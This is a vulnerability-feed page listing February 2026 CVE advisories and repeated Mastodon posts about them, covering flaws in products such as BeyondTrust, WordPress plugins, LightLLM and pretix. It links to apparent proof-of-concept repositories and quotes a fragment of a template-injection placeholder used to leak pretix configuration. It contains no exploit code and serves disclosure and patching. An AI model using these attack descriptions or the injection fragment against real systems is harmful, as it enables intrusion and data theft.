🟠 CVE-2025-70828 - High (8.8)

An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via the url parameter in the JDBC configuration

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T17:33:45.000Z ##

🟠 CVE-2025-70828 - High (8.8)

An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via the url parameter in the JDBC configuration

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70866
(8.8 HIGH)

EPSS: 0.01%

updated 2026-02-17T16:20:26.010000

2 posts

LavaLite CMS 10.1.0 is vulnerable to Incorrect Access Control. An authenticated user with low-level privileges (User role) can directly access the admin backend by logging in through /admin/login. The vulnerability exists because the admin and user authentication guards share the same user provider without role-based access control verification.

thehackerwire@mastodon.social at 2026-02-17T16:36:41.000Z ##

🟠 CVE-2025-70866 - High (8.8)

LavaLite CMS 10.1.0 is vulnerable to Incorrect Access Control. An authenticated user with low-level privileges (User role) can directly access the admin backend by logging in through /admin/login. The vulnerability exists because the admin and use...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:36:41.000Z ##

🟠 CVE-2025-70866 - High (8.8)

LavaLite CMS 10.1.0 is vulnerable to Incorrect Access Control. An authenticated user with low-level privileges (User role) can directly access the admin backend by logging in through /admin/login. The vulnerability exists because the admin and use...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-65717
(9.1 CRITICAL)

EPSS: 0.02%

updated 2026-02-17T15:32:42

4 posts

An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.

thehackerwire@mastodon.social at 2026-02-17T16:12:42.000Z ##

🔴 CVE-2025-65717 - Critical (9.1)

An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:02:04.000Z ##

🔴 CVE-2025-65717 - Critical (9.1)

An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:12:42.000Z ##

🔴 CVE-2025-65717 - Critical (9.1)

An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:02:04.000Z ##

🔴 CVE-2025-65717 - Critical (9.1)

An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-65716
(8.8 HIGH)

EPSS: 0.02%

updated 2026-02-17T15:32:42

2 posts

An issue in Visual Studio Code Extensions Markdown Preview Enhanced v0.8.18 allows attackers to execute arbitrary code via uploading a crafted .Md file.

thehackerwire@mastodon.social at 2026-02-17T16:02:04.000Z ##

🟠 CVE-2025-65716 - High (8.8)

An issue in Visual Studio Code Extensions Markdown Preview Enhanced v0.8.18 allows attackers to execute arbitrary code via uploading a crafted .Md file.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:02:04.000Z ##

🟠 CVE-2025-65716 - High (8.8)

An issue in Visual Studio Code Extensions Markdown Preview Enhanced v0.8.18 allows attackers to execute arbitrary code via uploading a crafted .Md file.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15578
(9.8 CRITICAL)

EPSS: 0.02%

updated 2026-02-17T15:32:42

2 posts

Maypole versions from 2.10 through 2.13 for Perl generates session ids insecurely. The session id is seeded with the system time (which is available from HTTP response headers), a call to the built-in rand() function, and the PID.

thehackerwire@mastodon.social at 2026-02-17T16:01:54.000Z ##

🔴 CVE-2025-15578 - Critical (9.8)

Maypole versions from 2.10 through 2.13 for Perl generates session ids insecurely. The session id is seeded with the system time (which is available from HTTP response headers), a call to the built-in rand() function, and the PID.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:01:54.000Z ##

🔴 CVE-2025-15578 - Critical (9.8)

Maypole versions from 2.10 through 2.13 for Perl generates session ids insecurely. The session id is seeded with the system time (which is available from HTTP response headers), a call to the built-in rand() function, and the PID.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2447
(8.8 HIGH)

EPSS: 0.02%

updated 2026-02-17T15:32:41

3 posts

Heap buffer overflow in libvpx. This vulnerability affects Firefox < 147.0.4, Firefox ESR < 140.7.1, and Firefox ESR < 115.32.1.

thehackerwire@mastodon.social at 2026-02-17T16:02:15.000Z ##

🟠 CVE-2026-2447 - High (8.8)

Heap buffer overflow in libvpx. This vulnerability affects Firefox &lt; 147.0.4, Firefox ESR &lt; 140.7.1, Firefox ESR &lt; 115.32.1, Thunderbird &lt; 140.7.2, and Thunderbird &lt; 147.0.2.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

Mozilla@activitypub.awakari.com at 2026-02-16T20:41:52.000Z ## Slackware 15.0 Mozilla Thunderbird Critical Buffer Overflow CVE-2026-2447 New mozilla-thunderbird packages are available for Slackware 15.0 and -current to fix a security issue.

#Slackware #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

thehackerwire@mastodon.social at 2026-02-17T16:02:15.000Z ##

🟠 CVE-2026-2447 - High (8.8)

Heap buffer overflow in libvpx. This vulnerability affects Firefox &lt; 147.0.4, Firefox ESR &lt; 140.7.1, Firefox ESR &lt; 115.32.1, Thunderbird &lt; 140.7.2, and Thunderbird &lt; 147.0.2.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2616
(8.8 HIGH)

EPSS: 0.00%

updated 2026-02-17T15:16:24.717000

2 posts

A vulnerability has been found in Beetel 777VR1 up to 01.00.09. The impacted element is an unknown function of the component Web Management Interface. The manipulation leads to hard-coded credentials. The attack needs to be initiated within the local network. The exploit has been disclosed to the public and may be used. It is advisable to modify the configuration settings. The vendor was contacted

thehackerwire@mastodon.social at 2026-02-17T16:00:11.000Z ##

🟠 CVE-2026-2616 - High (8.8)

A vulnerability has been found in Beetel 777VR1 up to 01.00.09. The impacted element is an unknown function of the component Web Management Interface. The manipulation leads to hard-coded credentials. The attack needs to be initiated within the lo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:00:11.000Z ##

🟠 CVE-2026-2616 - High (8.8)

A vulnerability has been found in Beetel 777VR1 up to 01.00.09. The impacted element is an unknown function of the component Web Management Interface. The manipulation leads to hard-coded credentials. The attack needs to be initiated within the lo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2474
(7.5 HIGH)

EPSS: 0.03%

updated 2026-02-17T15:16:23.760000

4 posts

Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom(). The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) is supplied, the expression length + 1u causes an integer wraparound, resulting in a zero-byte allocation. The subsequent call to getrandom(data, length,

thehackerwire@mastodon.social at 2026-02-17T16:12:30.000Z ##

🟠 CVE-2026-2474 - High (7.5)

Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().

The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:01:54.000Z ##

🟠 CVE-2026-2474 - High (7.5)

Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().

The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:12:30.000Z ##

🟠 CVE-2026-2474 - High (7.5)

Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().

The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:01:54.000Z ##

🟠 CVE-2026-2474 - High (7.5)

Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().

The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2439
(9.8 CRITICAL)

EPSS: 0.02%

updated 2026-02-17T15:16:23.420000

6 posts

Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's built-in rand function. Neither of these methods are secure, and attackers are able to guess session_ids that can grant them access to systems. Specificall

offseq at 2026-02-17T17:30:14.346Z ##

⚠️ CVE-2026-2439 (CRITICAL) in BVA Concierge::Sessions 0.8.1 – 0.8.4: Predictable session IDs due to weak randomness let attackers hijack sessions. Upgrade ASAP or use secure RNG for session IDs. radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-17T16:12:21.000Z ##

🔴 CVE-2026-2439 - Critical (9.8)

Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:01:45.000Z ##

🔴 CVE-2026-2439 - Critical (9.8)

Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-17T17:30:14.000Z ##

⚠️ CVE-2026-2439 (CRITICAL) in BVA Concierge::Sessions 0.8.1 – 0.8.4: Predictable session IDs due to weak randomness let attackers hijack sessions. Upgrade ASAP or use secure RNG for session IDs. radar.offseq.com/threat/cve-20 #OffSeq #CVE20262439 #infosec #vuln

##

thehackerwire@mastodon.social at 2026-02-17T16:12:21.000Z ##

🔴 CVE-2026-2439 - Critical (9.8)

Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:01:45.000Z ##

🔴 CVE-2026-2439 - Critical (9.8)

Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-69633
(9.8 CRITICAL)

EPSS: 0.03%

updated 2026-02-17T15:16:18.877000

2 posts

A SQL Injection vulnerability in the Advanced Popup Creator (advancedpopupcreator) module for PrestaShop 1.1.26 through 1.2.6 (Fixed in version 1.2.7) allows remote unauthenticated attackers to execute arbitrary SQL queries via the fromController parameter in the popup controller. The parameter is passed unsanitized to SQL queries in classes/AdvancedPopup.php (getPopups() and updateVisits() functi

thehackerwire@mastodon.social at 2026-02-17T16:20:23.000Z ##

🔴 CVE-2025-69633 - Critical (9.8)

A SQL Injection vulnerability in the Advanced Popup Creator (advancedpopupcreator) module for PrestaShop 1.1.26 through 1.2.6 (Fixed in version 1.2.7) allows remote unauthenticated attackers to execute arbitrary SQL queries via the fromController ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:20:23.000Z ##

🔴 CVE-2025-69633 - Critical (9.8)

A SQL Injection vulnerability in the Advanced Popup Creator (advancedpopupcreator) module for PrestaShop 1.1.26 through 1.2.6 (Fixed in version 1.2.7) allows remote unauthenticated attackers to execute arbitrary SQL queries via the fromController ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1731
(9.8 CRITICAL)

EPSS: 61.03%

updated 2026-02-17T13:40:10.320000

1 posts

BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability. By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user.

Nuclei template

3 repos

https://github.com/cybrdude/cve-2026-1731-scanner

https://github.com/win3zz/CVE-2026-1731

https://github.com/bytehazard/CVE-2026-1731

youranonnewsirc@nerdculture.de at 2026-02-17T03:50:08.000Z ##

Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.

#Cybersecurity #AI #Geopolitics

##

CVE-2026-2247(CVSS UNKNOWN)

EPSS: 0.14%

updated 2026-02-17T12:31:18

2 posts

SQL injection vulnerability (SQLi) in Clicldeu SaaS, specifically in the generation of reports, which occurs when a previously authenticated remote attacker executes a malicious payload in the URL generated after downloading the student's report card in the ‘Day-to-day’ section from the mobile application. In the URL of the generated PDF, the session token used does not expire, so it remains vali

offseq at 2026-02-17T13:00:36.021Z ##

CVE-2026-2247: HIGH-severity SQL injection in Clickedu SaaS (all versions). Attackers can exploit 'id_alu' in report card URLs to access sensitive data. Persistent session tokens increase risk. Prioritize mitigation! radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-02-17T13:00:36.000Z ##

CVE-2026-2247: HIGH-severity SQL injection in Clickedu SaaS (all versions). Attackers can exploit 'id_alu' in report card URLs to access sensitive data. Persistent session tokens increase risk. Prioritize mitigation! radar.offseq.com/threat/cve-20 #OffSeq #SQLi #InfoSec #EduSec

##

CVE-2025-7631
(8.6 HIGH)

EPSS: 0.03%

updated 2026-02-17T12:31:13

2 posts

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tumeva Internet Technologies Software Information Advertising and Consulting Services Trade Ltd. Co. Tumeva News Software allows SQL Injection.This issue affects Tumeva News Software: through 17022026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

thehackerwire@mastodon.social at 2026-02-17T12:44:18.000Z ##

🟠 CVE-2025-7631 - High (8.6)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tumeva Internet Technologies Software Information Advertising and Consulting Services Trade Ltd. Co. Tumeva News Software allows SQL Injection.Th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T12:44:18.000Z ##

🟠 CVE-2025-7631 - High (8.6)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tumeva Internet Technologies Software Information Advertising and Consulting Services Trade Ltd. Co. Tumeva News Software allows SQL Injection.Th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25903(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-02-17T12:31:13

2 posts

Apache NiFi 1.1.0 through 2.7.2 are missing authorization when updating configuration properties on extension components that have specific Required Permissions based on the Restricted annotation. The Restricted annotation indicates additional privileges required to add the annotated component to the flow configuration, but framework authorization did not check restricted status when updating a co

offseq at 2026-02-17T11:30:45.075Z ##

🔥 HIGH severity vuln: CVE-2026-25903 in Apache NiFi 1.1.0 – 2.7.2 lets less-privileged users alter restricted component configs. Upgrade to 2.8.0 ASAP. Monitor permissions & flows! radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-02-17T11:30:45.000Z ##

🔥 HIGH severity vuln: CVE-2026-25903 in Apache NiFi 1.1.0 – 2.7.2 lets less-privileged users alter restricted component configs. Upgrade to 2.8.0 ASAP. Monitor permissions & flows! radar.offseq.com/threat/cve-20 #OffSeq #NiFi #infosec #CVE202625903

##

CVE-2026-2592
(7.7 HIGH)

EPSS: 0.07%

updated 2026-02-17T05:16:17.430000

2 posts

The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Improper Access Control to Payment Status Update in all versions up to and including 5.0.16. This is due to the payment callback handler 'Return_from_ZarinPal_Gateway' failing to validate that the authority token provided in the callback URL belongs to the specific order being marked as paid. This makes it possible for unau

1 repos

https://github.com/drkim-dev/CVE-2026-25924

offseq@infosec.exchange at 2026-02-17T06:00:29.000Z ##

🛡️ CVE-2026-2592 (HIGH, CVSS 7.7): Zarinpal Gateway for WooCommerce has improper access control — orders can be marked as paid via reused authority tokens. All versions affected. Audit callback validation & monitor for fraud. Details: radar.offseq.com/threat/cve-20 #OffSeq #WooCommerce #WordPress

##

thehackerwire@mastodon.social at 2026-02-17T05:16:30.000Z ##

🟠 CVE-2026-2592 - High (7.7)

The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Improper Access Control to Payment Status Update in all versions up to and including 5.0.16. This is due to the payment callback handler 'Return_from_ZarinPal_Gateway' fail...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-26220(CVSS UNKNOWN)

EPSS: 0.55%

updated 2026-02-17T03:30:16

1 posts

LightLLM version 1.1.0 and prior contain an unauthenticated remote code execution vulnerability in PD (prefill-decode) disaggregation mode. The PD master node exposes WebSocket endpoints that receive binary frames and pass the data directly to pickle.loads() without authentication or validation. A remote attacker who can reach the PD master can send a crafted payload to achieve arbitrary code exec

offseq@infosec.exchange at 2026-02-17T08:30:38.000Z ##

⚠️ CRITICAL: CVE-2026-26220 in ModelTC LightLLM ≤1.1.0 allows unauth RCE via unsafe pickle deserialization on WebSocket endpoints. Restrict PD master node access & monitor for attacks. No patch yet — act now! radar.offseq.com/threat/cve-20 #OffSeq #infosec #CVE202626220 #rce

##

CVE-2025-12062
(8.8 HIGH)

EPSS: 0.06%

updated 2026-02-17T00:30:19

1 posts

The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8.6 via the fc_load_template function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .html files on the server, allowing the executio

thehackerwire@mastodon.social at 2026-02-17T00:19:03.000Z ##

🟠 CVE-2025-12062 - High (8.8)

The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8.6 via the fc_load_template function. This makes it poss...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2564
(8.1 HIGH)

EPSS: 0.04%

updated 2026-02-16T17:18:09.150000

1 posts

A security flaw has been discovered in Intelbras VIP 3260 Z IA 2.840.00IB005.0.T. Affected by this vulnerability is an unknown functionality of the file /OutsideCmd. The manipulation results in weak password recovery. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitation appears to be difficult. It is recommended to upgrade the affected component

1 repos

https://github.com/jduardo2704/CVE-2026-25643-Frigate-RCE

offseq@infosec.exchange at 2026-02-17T10:00:29.000Z ##

🛑 CRITICAL vuln (CVE-2026-2564) in Intelbras VIP 3260 Z IA (2.840.00IB005.0.T): Weak password recovery via /OutsideCmd enables remote attack. No user interaction needed. Restrict access, monitor, and await patch. radar.offseq.com/threat/cve-20 #OffSeq #CVE20262564 #IoTSecurity

##

CVE-2026-1333
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-16T15:32:54

1 posts

A Use of Uninitialized Variable vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS Desktop 2025 through Release SOLIDWORKS Desktop 2026 could allow an attacker to execute arbitrary code while opening a specially crafted EPRT file.

offseq@infosec.exchange at 2026-02-17T01:30:29.000Z ##

CVE-2026-1333 (HIGH, CVSS 7.8): SOLIDWORKS eDrawings 2025 – 2026 SP0 vulnerable to code execution via crafted EPRT files. No exploits yet, but patch and restrict file handling! radar.offseq.com/threat/cve-20 #OffSeq #vuln #SOLIDWORKS #infosec

##

CVE-2026-1046
(7.6 HIGH)

EPSS: 0.03%

updated 2026-02-16T15:32:54

1 posts

Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost Advisory ID: MMSA-2026-00577

thehackerwire@mastodon.social at 2026-02-16T22:57:48.000Z ##

🟠 CVE-2026-1046 - High (7.6)

Mattermost Desktop App versions &lt;=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1334
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-16T14:16:18.160000

1 posts

An Out-Of-Bounds Read vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS Desktop 2025 through Release SOLIDWORKS Desktop 2026 could allow an attacker to execute arbitrary code while opening a specially crafted EPRT file.

offseq@infosec.exchange at 2026-02-17T00:00:45.000Z ##

⚠️ CVE-2026-1334: HIGH-severity out-of-bounds read in SOLIDWORKS eDrawings (2025 SP0/2026 SP0). Exploiting crafted EPRT files can enable code execution. Patch when released, restrict sources, use sandboxing. No known exploits yet. radar.offseq.com/threat/cve-20 #OffSeq #SOLIDWORKS #Infosec

##

CVE-2026-2451(CVSS UNKNOWN)

EPSS: 0.05%

updated 2026-02-16T12:32:02

1 posts

Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained a security-relevant bug: It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code

offseq@infosec.exchange at 2026-02-17T04:30:30.000Z ##

⚠️ CVE-2026-2451 (HIGH): pretix-doistep 1.0.0 allows backend users to abuse email template placeholders to exfiltrate config, DB passwords & API keys. Rotate creds, audit templates & restrict edit rights ASAP. radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #pretix #InfoSec

##

CVE-2026-2452(CVSS UNKNOWN)

EPSS: 0.05%

updated 2026-02-16T12:32:01

1 posts

Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained a security-relevant bug: It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code

offseq@infosec.exchange at 2026-02-17T03:00:32.000Z ##

🔒 CVE-2026-2452 (HIGH): pretix-newsletter 1.0.0 & 2.0.0 let backend users leak sensitive data by abusing placeholders in email templates. Rotate credentials, restrict edit rights, and monitor changes! More: radar.offseq.com/threat/cve-20 #OffSeq #Vuln #pretix #Infosec

##

CVE-2026-26369
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-02-15T18:30:25

1 posts

eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/management specifying their own username to elevate their account to the UG_ADMIN group, bypassing intended access controls and gaining administrative capabiliti

thehackerwire@mastodon.social at 2026-02-16T22:57:57.000Z ##

🔴 CVE-2026-26369 - Critical (9.8)

eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-32062
(8.8 HIGH)

EPSS: 0.02%

updated 2026-02-15T11:15:54.307000

1 posts

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buffer overflow when receiving a specific packet on the established upper layer L2CAP channel. An attacker can leverage this vulnerability to obtain remote c

thehackerwire@mastodon.social at 2026-02-16T22:58:05.000Z ##

🟠 CVE-2025-32062 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1490
(9.8 CRITICAL)

EPSS: 0.08%

updated 2026-02-15T04:15:53.783000

3 posts

The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS (PTR record) spoofing on the 'checkWithoutToken' function in all versions up to, and including, 6.71. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leverage

1 repos

https://github.com/comthompson30/CVE-2026-1490

undercodenews@mastodon.social at 2026-02-17T19:39:10.000Z ##

Critical Vulnerability in CleanTalk WordPress Plugin Puts 200,000 Sites at Risk

A recently discovered critical vulnerability (CVE-2026-1490, CVSS 9.8) in the CleanTalk WordPress plugin, affecting versions up to 6.71, has raised alarms for the cybersecurity community. This flaw exposes over 200,000 websites to severe threats, allowing unauthenticated attackers to exploit the vulnerability. The attackers could potentially install malicious plugins and execute remote code…

undercodenews.com/critical-vul

##

beyondmachines1@infosec.exchange at 2026-02-17T08:01:23.000Z ##

Critical CleanTalk Plugin Vulnerability Allows WordPress Site Takeover via DNS Spoofing

A critical vulnerability in the CleanTalk WordPress plugin (CVE-2026-1490) allows unauthenticated attackers to bypass authorization via Reverse DNS spoofing and install arbitrary plugins, leading to full site takeover.

**If you are using ""Spam protection, Anti-Spam, FireWall by CleanTalk", update ASAP. Never rely on DNS records for authentication because they are easily spoofed by attackers.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

thehackerwire@mastodon.social at 2026-02-16T22:57:28.000Z ##

🔴 CVE-2026-1490 - Critical (9.8)

The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS (PTR record) spoofing on the 'checkWithoutToken' function in all ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2024-43468
(9.8 CRITICAL)

EPSS: 87.46%

updated 2026-02-13T14:04:05.243000

2 posts

Microsoft Configuration Manager Remote Code Execution Vulnerability

3 repos

https://github.com/tadash10/Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468

https://github.com/nikallass/CVE-2024-43468_mTLS_go

https://github.com/synacktiv/CVE-2024-43468

PC_Fluesterer@social.tchncs.de at 2026-02-17T11:47:21.000Z ##

Microsoft: Anderthalb Jahre alte Schwachstelle wird angegriffen

Im Oktober 2024 hat Microsoft (MS) eine Sicherheitslücke gestopft, die mit dem Risiko 9,8 von 10 eingestuft wurde. Oder sollten wir sagen: Hintertür? Die Schwachstelle CVE-2024-43468 besteht nämlich in einer unzureichenden Überprüfung und Reinigung von Benutzer-Eingaben. Will sagen: Wer die "passenden" Eingabewerte kennt, kann von Ferne und ohne Autorisierung Code ausführen (RCE, der GAU unter den Sicherheitslücken). Updates gegen diese Hintertür müssen sofort installiert werden - seit anderthalb Jahren! CVE-2024-43468 wurde gerade in den Katalog der bekanntermaßen ausgenutzten Sicherheitslücken (KEV) aufgenomm

pc-fluesterer.info/wordpress/2

#Allgemein #Hintergrund #Warnung #cybercrime #exploits #hintertür #Microsoft #UnplugTrump

##

PC_Fluesterer@social.tchncs.de at 2026-02-17T11:47:21.000Z ##

Microsoft: Anderthalb Jahre alte Schwachstelle wird angegriffen

